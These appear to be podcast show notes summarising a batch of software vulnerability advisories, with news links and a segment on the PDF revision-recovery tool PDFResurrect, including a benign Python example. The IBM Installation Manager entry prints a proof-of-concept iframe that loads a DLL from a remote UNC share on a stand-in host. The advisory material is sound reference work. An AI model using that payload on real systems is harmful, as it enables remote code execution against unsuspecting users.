Your daily source of Pwnage, Policy and Politics.


ISD Episode 13 (the suck!)


Vulnerabilities of Interest:

  1. file CDF File Parsing Multiple Buffer Overflow Vulnerabilities – The ‘file’ command is prone to multiple buffer-overflow vulnerabilities because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Versions prior to ‘file’ 5.02 are vulnerable.
  2. Sun Java Runtime Environment Multiple Unspecified Same Origin Policy Violation Vulnerabilities – Sun Java Runtime Environment is prone to multiple unspecified vulnerabilities that allow attackers to bypass the same-origin policy. This issue occurs because the application fails to properly enforce the same-origin policy for Java applets. An attacker may create a malicious applet that is loaded from a remote system to circumvent network access restrictions. The following are affected: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier, SDK and JRE 1.4.2_17 and earlier, and SDK and JRE 1.3.x_22 and earlier.
  3. Sun Java Runtime Environment XML Data Processing Multiple Vulnerabilities – Sun Java Runtime Environment is prone to multiple remote vulnerabilities. An attacker can exploit these issues to obtain sensitive information or crash the affected application, denying service to legitimate users. These issues affect the following versions on Solaris, Linux, and Windows platforms: JDK and JRE 6 Update 6 and earlier as well as JDK and JRE 5.0 Update 15 and earlier.
  4. Sun Java SE Java Management Extensions (JMX) Unspecified Unauthorized Access Vulnerability – JMX is prone to an unspecified unauthorized-access vulnerability. The vulnerability allows a JMX client to perform unauthorized actions on a computer running JMX with local monitoring enabled. The issue affects the following versions for Windows, Solaris, and Linux: JDK and JRE 6 Update 6 and earlier as well as JDK and JRE 5.0 Update 15 and earlier.
  5. Sun Java Runtime Environment Virtual Machine Privilege Escalation Vulnerability – Sun Java Runtime Environment Virtual Machine is prone to a privilege-escalation vulnerability when running untrusted applications or applets. Successful exploits may allow attackers to read, write, or execute arbitrary local files in the context of the user running an untrusted application in the affected virtual machine. This may result in a compromise of the underlying system. This issue affects the following versions: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier, and SDK and JRE 1.4.2_17 and earlier.
  6. Hitachi Multiple Products Remote Code Execution Vulnerabilities – Multiple products from Hitachi are prone to multiple code-execution vulnerabilities. A remote attacker could exploit these issues by enticing a victim to open a malicious file. Successfully exploiting these issues would allow the attacker to execute arbitrary code in the context of the currently logged-in user or cause denial-of-service conditions.
  7. IBM Installation Manager ‘iim://’ URI Handling Remote Code Execution Vulnerability – IBM Installation Manager is prone to a remote code-execution vulnerability. Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions. The following products that include Installation Manager are vulnerable: IBM Rational Robot and IBM Rational Team Concert. The following proof of concept is available: <iframe src='iim://" -vm \\www.example.com\uncshare\sh.dll -url "'></iframe> Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
  8. Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities – Omni-NFS is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied network data before copying it into an insufficiently sized memory buffer. The issues affect both server and client. Exploiting these issues allows attackers to execute arbitrary machine code in the context of users running the affected application. Failed attempts will likely crash the application, resulting in denial-of-service conditions. Omni-NFS 5.2 is vulnerable; other versions may also be affected. Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. Exploits are also available in the wild.
  9. Hitachi Device Manager IPv6 Security Bypass Vulnerability – Hitachi Device Manager and JP1/HiCommand are prone to a security-bypass vulnerability because of an unspecified error related to IPv6 functionality. Very few technical details are available as of now, though we will continue to monitor this one.
  10. Hitachi Multiple Products GIF File Parsing Buffer Overflow Vulnerability – Multiple Hitachi products, including Cosminexus, Processing Kit for XML, and Hitachi Developer’s Kit for Java, are prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
  11. Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability – The Apache ‘mod_proxy_ftp’ module is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. A working commercial exploit is available through Intevydis; it is not otherwise publicly available or known to be circulating in the wild.
  12. WebKit Preflight Request Same-Origin Policy Bypass Vulnerability – WebKit is prone to a vulnerability that lets attackers bypass the same-origin policy. Attackers can exploit this issue to access resources from another origin in the context of another domain. This can facilitate cross-site request-forgery attacks.
  13. Sun Solaris Samba Information Disclosure and Denial of Service – Sun has acknowledged some vulnerabilities in Samba in Solaris, which can be exploited by malicious users to disclose sensitive information and cause a DoS (Denial of Service).

News Items of Interest:
News item 1: (http://www.theglobeandmail.com/news/technology/rim-security-chief-warns-of-future-smart-phone-attacks/article1368297/)

News item 2: (http://www.h-online.com/security/news/item/Fedora-12-allows-users-install-privilege-Update-863623.html)

News item 3: (http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1374839,00.html)

News item 4: (http://www.reuters.com/article/rbssTechMediaTelecomNews/idUSPEK26455220091119?rpc=401)

News item 5: (http://www.cio.com/article/508029/How_to_Hack_China_for_Just_1_800?source=rss_security)

News item 6: (http://www.informationweek.com/news/government/policy/showArticle.jhtml?articleID=221900107)
Tech Segment:

PDFResurrect is a tool aimed at analyzing PDF documents. The PDF format allows for previous document changes to be retained in a more recent version of the document, thereby creating a running history of changes for the document. This tool attempts to extract all previous versions while also producing a summary of changes between versions. This tool can also “scrub” or write data over the original instances of PDF objects that have been modified or deleted, in an effort to disguise information from previous versions that might not be intended for anyone else to read.
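As an added example (not part of PDFResurrect or this post), the Python script below shows the mechanism the tool relies on: each incremental save appends its new objects, a new trailer and a new %%EOF to the end of the file, so truncating at each %%EOF recovers the document as it stood after that revision, and comparing the object bodies between two revisions lists what was changed. The two-revision PDF it scans is constructed inline; its xref offsets are placeholders and are never used.

```python
import re

# Constructed toy PDF (not a real PDFResurrect test file): revision 1 holds a
# content stream saying DRAFT; an appended incremental update redefines object 4
# to say FINAL. Xref tables and offsets are placeholders; the scan ignores them.
REV1 = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj\n"
    b"4 0 obj << /Length 5 >> stream\nDRAFT\nendstream endobj\n"
    b"xref\n0 0\ntrailer << /Size 5 /Root 1 0 R >>\nstartxref\n0\n%%EOF\n"
)
UPDATE = (
    b"4 0 obj << /Length 5 >> stream\nFINAL\nendstream endobj\n"
    b"xref\n0 0\ntrailer << /Size 5 /Root 1 0 R /Prev 0 >>\nstartxref\n0\n%%EOF\n"
)
SAMPLE_PDF = REV1 + UPDATE

# "N G obj ... endobj" with the body captured; DOTALL so streams may span lines.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)


def revision_ends(data: bytes) -> list[int]:
    """Byte offset just past each %%EOF marker; one entry per saved revision."""
    return [m.end() for m in re.finditer(rb"%%EOF", data)]


def extract_revision(data: bytes, n: int) -> bytes:
    """The file as it existed after revision n (0-based): cut at that %%EOF."""
    return data[: revision_ends(data)[n]]


def objects(data: bytes) -> dict[int, bytes]:
    """Map object number -> body; a later definition overrides an earlier one."""
    out: dict[int, bytes] = {}
    for num, _gen, body in OBJ_RE.findall(data):
        out[int(num)] = body.strip()
    return out


def changed_objects(data: bytes, older: int, newer: int) -> list[int]:
    """Object numbers added or rewritten between two revisions."""
    a = objects(extract_revision(data, older))
    b = objects(extract_revision(data, newer))
    return sorted(n for n in b if a.get(n) != b[n])


if __name__ == "__main__":
    ends = revision_ends(SAMPLE_PDF)
    print(f"{len(ends)} revision(s) found")
    for i in range(1, len(ends)):
        print(f"rev {i-1} -> rev {i}: changed objects {changed_objects(SAMPLE_PDF, i-1, i)}")
```

The recovered earlier revision still carries the DRAFT stream even though no viewer shows it, which is exactly the leftover history a reviewer should check for before a document leaves the organisation.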

This project is released under the GNU GPLv3 license. So have at it!

Download PDFResurrect v0.9

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.
